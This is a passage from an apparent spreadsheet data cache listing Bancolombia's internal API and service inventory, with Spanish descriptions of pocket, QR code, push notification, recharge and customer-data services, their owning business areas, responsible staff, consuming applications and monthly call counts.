    <n v="141"/>
    <s v="Pocket - Management"/>
    <n v="122"/>
    <s v="pocket-management"/>
    <s v="Habilita las capacidades de gestión sobre los bolsillos de una cuenta de ahorro, como su creación o cancelación, por ejemplo."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <s v="GestionDeBolsillos/V1.0"/>
    <m/>
    <s v="APP_PRODUCTORCONSUMIDOR _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ BC_Monitoreo_ProductorConsumidor_Depositos _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <n v="2978"/>
    <n v="2782"/>
    <n v="2424"/>
    <n v="2131"/>
    <n v="3483"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-01-18T17:31:37"/>
    <s v="Pockets"/>
    <n v="141"/>
    <s v="Pocket - Transactions"/>
    <n v="102"/>
    <s v="pocket-transactions"/>
    <s v="Habilita las capacidades de consulta relacionada con los movimientos que puede tener un bolsillo en particular, por ejemplo, adiciones, retiros o transferencias."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <s v="ConsultaMovimientosBolsillos/V1.0"/>
    <m/>
    <s v="APP_PRODUCTORCONSUMIDOR _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ BC_Monitoreo_ProductorConsumidor_Depositos _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <n v="2979"/>
    <n v="2785"/>
    <n v="2309"/>
    <n v="2117"/>
    <n v="3438"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-01-18T17:31:37"/>
    <s v="Pockets"/>
    <n v="141"/>
    <s v="Pocket - Transfers"/>
    <n v="102"/>
    <s v="pocket-transfers"/>
    <s v="Habilita las capacidades monetarias, como abonos, retiros y transferencias a los bolsillos de una cuenta."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <s v="TransferenciasDeBolsillos/V1.0"/>
    <m/>
    <s v="APP_PRODUCTORCONSUMIDOR _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ BC_Monitoreo_ProductorConsumidor_Depositos _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <n v="5"/>
    <m/>
    <m/>
    <n v="5"/>
    <n v="2"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-27T14:30:30"/>
    <s v="Point Of Services"/>
    <n v="100"/>
    <s v="Point Of Services - Shift Information"/>
    <n v="100"/>
    <s v="point-of-service-shift-information"/>
    <s v="La API shift information tiene el objetivo de entregar información para las siguientes consultas  Consultar el identificador de un cliente y no cliente banco Consultar los servicios que prestan las sucursales "/>
    <s v="CANALES_TRADICIONALES"/>
    <s v="Sucursales"/>
    <s v="Distribución Fisica"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Predictor Ingresos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El objetivo del servicio es consultar los datos de los 6 últimos meses de los ingresos del cliente, producto de su nómina y/o pensión recibida en cuentas de depósitos de Bancolombia para ser procesada en solicitudes de crédito de vivienda. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos y Recaudos"/>
    <m/>
    <m/>
    <s v="Pagos automáticos Bancolombia - PAB_ISPAB0001"/>
    <s v="AW0922 _x000d__x000a_AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-05-20T11:09:59"/>
    <s v="Loans Study Vehicle"/>
    <n v="101"/>
    <s v="Preliminary Study"/>
    <n v="101"/>
    <s v="preliminary-study"/>
    <s v="El proceso de Estudio Preliminar, permite el registro de la información de los datos básicos del cliente, actividad económica, datos del vehí­culo y datos propios del comercio para realizar la ejecución del estudio preliminar para el crédito de véhiculo y obtener una aprobación parcial y permitir continuar con el proceso final del estudio."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="VentasDigitalesSufi_NU0037 _x000d__x000a_ MovilidadCore_AW1281002"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-04-06T02:22:21"/>
    <s v="Loans Study Vehicle"/>
    <n v="105"/>
    <s v="Preliminary Study"/>
    <n v="105"/>
    <s v="preliminary-study"/>
    <s v="El proceso de Estudio Preliminar, permite el registro de la información de los datos básicos del cliente, actividad económica, datos del vehí­culo y datos propios del comercio para realizar la ejecución del estudio preliminar para el crédito de véhiculo y obtener una aprobación parcial y permitir continuar con el proceso final del estudio."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ VentasDigitalesSufiVehiculos_AW1097001 _x000d__x000a_ MovilidadCore_AW1281002"/>
    <n v="40933"/>
    <n v="42088"/>
    <n v="35909"/>
    <n v="36716"/>
    <n v="47279"/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Procesamiento Archivos Depositos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio permite notificar a depósitos que se le envió un archivo para que lo procese. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="Finacle Ent._Recaudos - Colombia_AW1065001"/>
    <s v="AW01065 _x000d__x000a_SUF _x000d__x000a_AFC _x000d__x000a_NU0001 _x000d__x000a_AW1078 _x000d__x000a_AW1110001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-23T17:21:20"/>
    <s v="Push Notifications"/>
    <n v="100"/>
    <s v="Push Notifications - Customer Information"/>
    <n v="100"/>
    <s v="push-notifications-customer-information"/>
    <s v="Notificaciones Push (Push Notifications) hace referencia a los mensajes instantáneos que se entregan al usuario en su teléfono inteligente, por lo cual el usuario dependerá de tener siempre Internet para recibir los mismos. Su proveedor será IBM Cloud.     Esta API tiene como función, permitir a las APPs consumidoras de los servicios de Push, confirmar si un usuario ya está enrolado, desde que APP se enroló y desde que dispositivo. Esto con el fin de poder validar si debe hacerse enrolamiento o cambio de dispositivo."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Canales Digitales Personas"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="APP-PERSONAS_NU0146001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-23T17:21:20"/>
    <s v="Push Notifications"/>
    <n v="100"/>
    <s v="Push Notifications - Customer Management"/>
    <n v="100"/>
    <s v="push-notifications-customer-management"/>
    <s v="Notificaciones Push hace referencia a los mensajes instantáneos que se entregan al usuario en su teléfono inteligente, por lo cual el usuario dependerá de tener siempre Internet para recibir los mismos. Su proveedor será IBM Cloud.     Esta API tiene como función administrar el usuario que acepte enrolarse en el sistema de Notificaciones Push de Bancolombia. Para la administración de estos usuarios, inicialmente se podrá guardar los datos del cliente enrolado en el Gestor de Enví­o y más adelante actualizar las categorí­as que un cliente active o inactive desde las diferentes APPs."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Canales Digitales Personas"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="APP-PERSONAS_NU0146001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <m/>
    <n v="144"/>
    <n v="5801"/>
    <n v="61"/>
    <n v="1456896"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-23T17:21:20"/>
    <s v="Push Notifications"/>
    <n v="100"/>
    <s v="Push Notifications - Send"/>
    <n v="100"/>
    <s v="push-notifications-send"/>
    <s v="Notificaciones Push hace referencia a los mensajes instantáneos que se entregan al usuario en su teléfono inteligente, por lo cual el usuario dependerá de tener siempre Internet para recibir los mismos. Su proveedor será IBM Cloud.     Esta API tiene como función, servir como canal de comunicación con el Gestor de Enví­o. La información necesaria para el enví­o de una notificación Push son el tipo y níºmero de documento y el mensaje."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Canales Digitales Personas"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="APP-PERSONAS_NU0146001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-17T21:32:40"/>
    <s v="QR Code"/>
    <n v="204"/>
    <s v="QR Code - Intention"/>
    <n v="102"/>
    <s v="qr-code-intention"/>
    <s v="Esta API permite generar intenciones de compra y cargarlas en códigos QR Mixtos. Las intenciones de compra son paquetes de información que llevan todos los datos de la compra, como el monto, el identificador íºnico de QR, níºmero de venta o níºmeros de fidelidad. Este paquete de información se actualiza en el código QR para que sea leí­do por el cliente pagador."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <s v="ECOSISTEMAS"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="PRAGMA _x000d__x000a_ MonitoreoDCM_AAA _x000d__x000a_ TAXIS SAN JUAN _x000d__x000a_ Zencillo Automatización _x000d__x000a_ A PAGAR V2 _x000d__x000a_ PruebasIntegración _x000d__x000a_ SmartPayment POS EGlobalT _x000d__x000a_ Backend de Taxis Libres App _x000d__x000a_ Propia _x000d__x000a_ BE MOVIL _x000d__x000a_ POS 4.0 _x000d__x000a_ Autocab driver companyon _x000d__x000a_ BAGUER _x000d__x000a_ D y S SAS _x000d__x000a_ PagoCI24 _x000d__x000a_ TAXI TAXI _x000d__x000a_ APP IMPULSADOR _x000d__x000a_ AUTOCAB _x000d__x000a_ RADIO TAXI _x000d__x000a_ AUTOCAB ASISTENTE CONDUCTOR _x000d__x000a_ Tax Andaluz _x000d__x000a_ Payment Gateway controles inteligentes _x000d__x000a_ MOVIVA _x000d__x000a_ Cegid V.2.0 _x000d__x000a_ PTM _x000d__x000a_ zencillo Capturador _x000d__x000a_ TAXIS VERDES _x000d__x000a_ COOPEBOMBASV2"/>
    <n v="3154"/>
    <n v="2677"/>
    <n v="54"/>
    <n v="50"/>
    <n v="787"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-07-08T18:17:51"/>
    <s v="QR Code"/>
    <n v="101"/>
    <s v="QR Code - QR Management"/>
    <n v="101"/>
    <s v="QR-Management"/>
    <s v="Capacidad que permite a las aplicaciones de terceros generar un código QR para realizar transferencias. Adicionalmente se notifica la transferencia realizada al contacto de alertas y notificaciones registrado de acuerdo al producto destino de la transferencia."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <s v="ECOSISTEMAS"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Soycoopebombas _x000d__x000a_ TAXIA LIFE APP _x000d__x000a_ CONDUCTOR TAX INDIVIDUAL _x000d__x000a_ APP TORO AUTOS _x000d__x000a_ SMART ONE _x000d__x000a_ Mis Aliados _x000d__x000a_ LOS MOVILES _x000d__x000a_ Cegid _x000d__x000a_ MOVIVA _x000d__x000a_ AUTOCAB _x000d__x000a_ TAXIS VERDES _x000d__x000a_ 322 APP _x000d__x000a_ AUTOCAB ASISTENTE CONDUCTOR _x000d__x000a_ TAXI TAXI _x000d__x000a_ RADIO TAXI _x000d__x000a_ A PAGAR"/>
    <n v="6585"/>
    <n v="5885"/>
    <n v="5914"/>
    <n v="6081"/>
    <n v="4798"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-26T18:59:34"/>
    <s v="QR Code"/>
    <n v="204"/>
    <s v="QR Code - QR Management"/>
    <n v="202"/>
    <s v="qr-code-qr-management"/>
    <s v="Capacidad que permite a las aplicaciones de terceros generar un código QR para realizar transferencias. Adicionalmente se notifica la transferencia realizada al contacto de alertas y notificaciones registrado de acuerdo al producto destino de la transferencia."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <s v="ECOSISTEMAS"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="PRAGMA _x000d__x000a_ MonitoreoDCM_AAA _x000d__x000a_ TAXIS SAN JUAN _x000d__x000a_ Zencillo Automatización _x000d__x000a_ A PAGAR V2 _x000d__x000a_ PruebasIntegración _x000d__x000a_ SmartPayment POS EGlobalT _x000d__x000a_ Backend de Taxis Libres App _x000d__x000a_ Propia _x000d__x000a_ BE MOVIL _x000d__x000a_ POS 4.0 _x000d__x000a_ Autocab driver companyon _x000d__x000a_ BAGUER _x000d__x000a_ D y S SAS _x000d__x000a_ PagoCI24 _x000d__x000a_ TAXI TAXI _x000d__x000a_ APP IMPULSADOR _x000d__x000a_ AUTOCAB _x000d__x000a_ RADIO TAXI _x000d__x000a_ AUTOCAB ASISTENTE CONDUCTOR _x000d__x000a_ Tax Andaluz _x000d__x000a_ Payment Gateway controles inteligentes _x000d__x000a_ MOVIVA _x000d__x000a_ Cegid V.2.0 _x000d__x000a_ PTM _x000d__x000a_ zencillo Capturador _x000d__x000a_ TAXIS VERDES _x000d__x000a_ COOPEBOMBASV2"/>
    <n v="165812"/>
    <n v="873013"/>
    <n v="1045252"/>
    <n v="1095967"/>
    <n v="1127387"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-09-18T18:08:45"/>
    <s v="query-customer"/>
    <n v="201"/>
    <s v="Query - Corporate - Customer"/>
    <n v="201"/>
    <s v="query-corporate-customer"/>
    <s v="La Api Query - Corporate - Customer permite la consulta de información general, información financiera y la información de contactos, accionistas, grupo económico y miembros de junta de una empresa particular sea persona natural o jurí­dica."/>
    <s v="CLIENTES"/>
    <s v="Clientes Empresas"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="Esteban Arroyave Montoya"/>
    <s v="ConsultaInformacionClienteEmpresarial/V1.0"/>
    <m/>
    <s v="PortalConstructor_AW0360004 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="6910"/>
    <n v="5909"/>
    <n v="5276"/>
    <n v="5279"/>
    <n v="6540"/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Realizar Operacion Cheque"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio obtendra las diferentes respuestas sobre la Lista de cheques por Oficina y sobre la actualización del estado del cheque una vez sea autorizada la impresión."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Hipotecario"/>
    <s v="Inmobiliario"/>
    <s v="Productor"/>
    <s v="Hipotecario"/>
    <s v="Martha Luz Pardo"/>
    <m/>
    <s v="FINACLE 10.6_CREDITO HIPOTECARIO_AW1010001"/>
    <s v="SCI _x000d__x000a_AW0709001 _x000d__x000a_AW01010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Realizar Operacion Fiduciaria"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="REALIZAR OPERACION FIDUCIARIA"/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-11-19T12:28:07"/>
    <s v="Recharges"/>
    <n v="101"/>
    <s v="Recharges-Product Balance"/>
    <n v="101"/>
    <s v="recharges-product-balance"/>
    <s v="La API permite realizar la consulta de saldos de las recargas de cualquier producto o servicio en particular, por ejemplo: (Transporte, entretenimiento, telefoní­a)."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Transferencias y Recargas"/>
    <m/>
    <m/>
    <m/>
    <s v="ALM_AW0955001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ ALM_AW0955"/>
    <n v="730176"/>
    <n v="665617"/>
    <n v="635359"/>
    <n v="567594"/>
    <n v="705142"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-03-04T17:58:37"/>
    <s v="Recharges"/>
    <n v="200"/>
    <s v="Recharges-Product Balance"/>
    <n v="200"/>
    <s v="recharges-product-balance"/>
    <s v="La API permite realizar la consulta de saldos de las recargas de cualquier producto o servicio en particular, por ejemplo: (Transporte, entretenimiento, telefoní­a)."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Transferencias y Recargas"/>
    <m/>
    <m/>
    <m/>
    <s v="APIC_PRODUCTORCONSUMIDOR_PDN_DANVA _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <n v="730176"/>
    <n v="665617"/>
    <n v="635359"/>
    <n v="567594"/>
    <n v="705142"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-11-19T12:28:07"/>
    <s v="Recharges"/>
    <n v="101"/>
    <s v="Recharges-Recharges Management"/>
    <n v="102"/>
    <s v="recharges-recharges-management"/>
    <s v="La API Recharges,  permite  realizar y consultar las recargas de servicios (Entretenimiento, servicios píºblicos, telefoní­a móvil, TV) realizadas por los diferentes canales del  banco. Dentro de sus operaciones se encuentran:  1.  POST/recharges Capacidad que  permite crear la recarga de un servicio por los distintos canales que ofrece el Banco al Core de Recargas. 2.  POST/Recharges Capacidad que  permite realizar la consulta del estado de la recarga realizada por el cliente Bancolombia."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Transferencias y Recargas"/>
    <m/>
    <m/>
    <m/>
    <s v="ALM_AW0955001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ ALM_AW0955"/>
    <n v="710848"/>
    <n v="628700"/>
    <n v="605696"/>
    <n v="538410"/>
    <n v="647424"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-03-04T17:58:37"/>
    <s v="Recharges"/>
    <n v="200"/>
    <s v="Recharges-Recharges Management"/>
    <n v="200"/>
    <s v="recharges-recharges-management"/>
    <s v="La API Recharges,  permite  realizar y consultar las recargas de servicios (Entretenimiento, servicios píºblicos, telefoní­a móvil, TV) realizadas por los diferentes canales del  banco. Dentro de sus operaciones se encuentran:  1.  POST/recharges Capacidad que  permite crear la recarga de un servicio por los distintos canales que ofrece el Banco al Core de Recargas. 2.  POST/Recharges Capacidad que  permite realizar la consulta del estado de la recarga realizada por el cliente Bancolombia."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Transferencias y Recargas"/>
    <m/>
    <m/>
    <m/>
    <s v="APIC_PRODUCTORCONSUMIDOR_PDN_DANVA _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <n v="710848"/>
    <n v="628700"/>
    <n v="605696"/>
    <n v="538410"/>
    <n v="647424"/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Recuperar Catalogo_BB2"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El este servicio permite realizar búsqueda de documentos sobre UCM."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Catálogo de Documentos BB2_Catálogo de Documentos BB2_AW0931001"/>
    <s v="AW0922 _x000d__x000a_AW0856 _x000d__x000a_AW0998 _x000d__x000a_NU0142001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Recuperar Cliente"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Consulta los datos de un cliente en el HUB de Información, con el fin de verificar la existencia del mismo en el banco"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="SAP CRM"/>
    <s v="AW0718001 _x000d__x000a_AW0611001 _x000d__x000a_AW0709001 _x000d__x000a_AW0683001 _x000d__x000a_AW0628001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Recuperar Comisiones Cliente"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Permitir consultar la información de las Comisiones de los productos Trade (carta de crédito de importación o garantía standby emitidas) ofrecidas por Bancolombia a un Cliente."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Tesoreria"/>
    <s v="Tesoreria"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="FINACLE - COLOMBIA_TRADE_AW0684001"/>
    <s v="SVE _x000d__x000a_AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Recuperar Cuentas Deposito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Permite obtener la información de las cuentas de depósito atadas a un número de documento específico."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <m/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Recuperar Datos Cliente"/>
    <n v="310"/>
    <s v="No Aplica"/>
    <s v="El servicio posibilita a nuevos consumidores o nuevos componentes la consulta de información de clientes."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="Hub de Información_Entrega de informacion_AW0846001"/>
    <s v="AW1177 _x000d__x000a_AW0937 _x000d__x000a_SAI _x000d__x000a_SU2 _x000d__x000a_AW0856 _x000d__x000a_PAC _x000d__x000a_SCI _x000d__x000a_CNB _x000d__x000a_AW0210001 _x000d__x000a_ALM _x000d__x000a_SVP _x000d__x000a_ALL _x000d__x000a_AW0611001 _x000d__x000a_GDE _x000d__x000a_AW0709001 _x000d__x000a_CDE _x000d__x000a_AW1128 _x000d__x000a_AW01010 _x000d__x000a_APP _x000d__x000a_PSE _x000d__x000a_AW1011 _x000d__x000a_SVE _x000d__x000a_ATM _x000d__x000a_AUD _x000d__x000a_FAC _x000d__x000a_AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Recuperar Datos Cliente"/>
    <n v="400"/>
    <s v="No Aplica"/>
    <s v="El servicio posibilita a nuevos consumidores o nuevos componentes la consulta de información de clientes."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="Hub de Información_Entrega de informacion_AW0846001"/>
    <s v="AW1177 _x000d__x000a_AW0937 _x000d__x000a_ELIBOM _x000d__x000a_SU2 _x000d__x000a_AW0856 _x000d__x000a_AW1294001 _x000d__x000a_AW1097001 _x000d__x000a_AW0210001 _x000d__x000a_SVP _x000d__x000a_GDE _x000d__x000a_AW1287001 _x000d__x000a_AW1287 _x000d__x000a_AW1078 _x000d__x000a_AW1128 _x000d__x000a_APP _x000d__x000a_AW1011 _x000d__x000a_AW1204001 _x000d__x000a_SVE _x000d__x000a_AW0939001 _x000d__x000a_AW0360009 _x000d__x000a_AW1108001 _x000d__x000a_AW1165 _x000d__x000a_AW1203001 _x000d__x000a_AW1272001 _x000d__x000a_AW1285001 _x000d__x000a_AW1302001 _x000d__x000a_NU0004001 _x000d__x000a_TVP _x000d__x000a_AW1249 _x000d__x000a_AW0638 _x000d__x000a_AW1258002 _x000d__x000a_APIC _x000d__x000a_AW1312001 _x000d__x000a_CDT"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Recuperar Datos Cliente"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="El servicio posibilita a nuevos consumidores o nuevos componentes la consulta de información de clientes."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="MDM"/>
    <s v="AW0718001 _x000d__x000a_AW0683001 _x000d__x000a_AW0227001 _x000d__x000a_AW0628001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Recuperar Datos Cliente"/>
    <n v="300"/>
    <s v="No Aplica"/>
    <s v="El servicio posibilita a nuevos consumidores o nuevos componentes la consulta de información de clientes."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="HUB"/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Recuperar Documentos_BB1"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Permite realizar consultas al interior de la plataforma de gestión documental, de tal forma que se obtiene el enlace en donde se pueden visualizar las imágenes de los documentos previamente almacenados."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
